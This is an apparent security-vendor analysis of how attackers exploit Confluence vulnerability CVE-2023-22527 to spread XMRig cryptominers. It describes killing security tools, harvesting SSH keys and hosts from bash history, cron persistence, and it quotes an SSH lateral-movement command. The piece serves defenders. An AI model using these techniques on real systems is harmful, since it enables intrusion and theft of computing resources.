Hacks & Vulnerabilities
A technical examination on how CVE-2023-22527 can be manipulated by malevolent entities for illicit cryptocurrency mining assaults that can propagate throughout the target’s system.
Duration to read: ( words)
- The critical vulnerability CVE-2023-22527 is currently being exploited for illicit cryptocurrency mining activities, transforming impacted environments into cryptocurrency mining networks.
- The intrusions involve malevolent actors who leverage techniques such as executing shell scripts and XMRig miners, aiming at SSH endpoints, terminating conflicting cryptocurrency mining operations, and ensuring continuity through cron jobs.
- Enterprises are encouraged to update their Confluence instances to the most recent versions and enforce security best practices and solutions to safeguard their systems.
On Jan 16, 2024, Atlassian issued a security announcement regarding CVE-2023-22527, a critical (score of 10) vulnerability that impacts Confluence Data Center and Confluence Server, which are corporate-grade deployments of Atlassian Confluence, a platform for collaboration and documentation intended for teams and organizations to generate, share, and cooperate on content.
In an earlier blog post, we offered a concise technical breakdown of CVE-2023-22527 and how a malicious entity could potentially exploit it for nefarious activities. In this article, we will explore how offenders have been abusing the vulnerability to launch illicit cryptocurrency mining campaigns.
By misusing CVE-2023-22527, an unauthenticated assailant has the capability to exploit a template injection vulnerability present in outdated versions of Confluence Data Center and Server, ultimately allowing remoteExecute code remotely (RCE) on the impacted instance.
| Product | Impacted versions |
|---|---|
| Confluence Data Center and Server | 8.0.x 8.1.x 8.2.x 8.3.x 8.4.x 8.5.0-8.5.3 |
Table 1. Impacted Confluence Data Center and Confluence Server versions
This security flaw has been exploited for cryptomining purposes. Moreover, a significant number of exploitation attempts have been detected between mid-June and late July, 2024.
We have noted three primary malicious actors exploiting CVE-2023-22527 via harmful scripts. The initial actor deploys the XMRig miner to conduct mining operations using an ELF file payload (refer to figure 4).
The attack sequence carried out by the first malicious actor is as follows:
Meanwhile, the second malicious actor utilizes a shell script to execute mining operations through a shell file via Secure Shell (SSH) across all reachable endpoints in the client’s setup. As depicted in Figure 6, the intruder retrieves the shell file and executes it using bash from memory.
We have analyzed this script, unveiling the following actions:
Initially, it terminates recognized cryptomining processes and any processes executed from */tmp/* directories.
Subsequently, all cron jobs are erased, and a fresh job is inserted to verify C&C server connectivity every five minutes.
The der function removes security tools such as Alibaba Cloud Shield and blocks the Alibaba Cloud Shield IP address. At the same time, the elif condition is implemented to uninstall Tencent Cloud mirrors.
Through the localgo method, the intruder identifies the machine’s IP address and fetches all potential users, IP addresses, and keys sourced from the user’s bash history, SSH setups, and known hosts. This data is then utilized to target other remote systems via SSH for executing cryptomining operations.
Once the required information has been gathered, the intruder proceeds to automate cryptomining operations on other machines through SSH:
ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key $user@$host -p $sshp “command”oStrictHostKeyChecking=no: Auto-accepts the host key without verification. oBatchMode=yes: Disables interactive password prompts.oConnectTimeout=3: Sets a 3-second timeout for the connection attempt.
For the subsequent functionality, cron, the assailant inserts various cron tasks under varied names (whoami, nginx, apache) in diverse locations (init.d, cron.hourly, cron.d) to maintain control over the server.
After ensuring the cessation or removal of all cloud monitoring and security services, the attacker ceases the initial attack vector exploiting CVE-2023-22527 and acquires the XMRig miner to commence the mining operations.
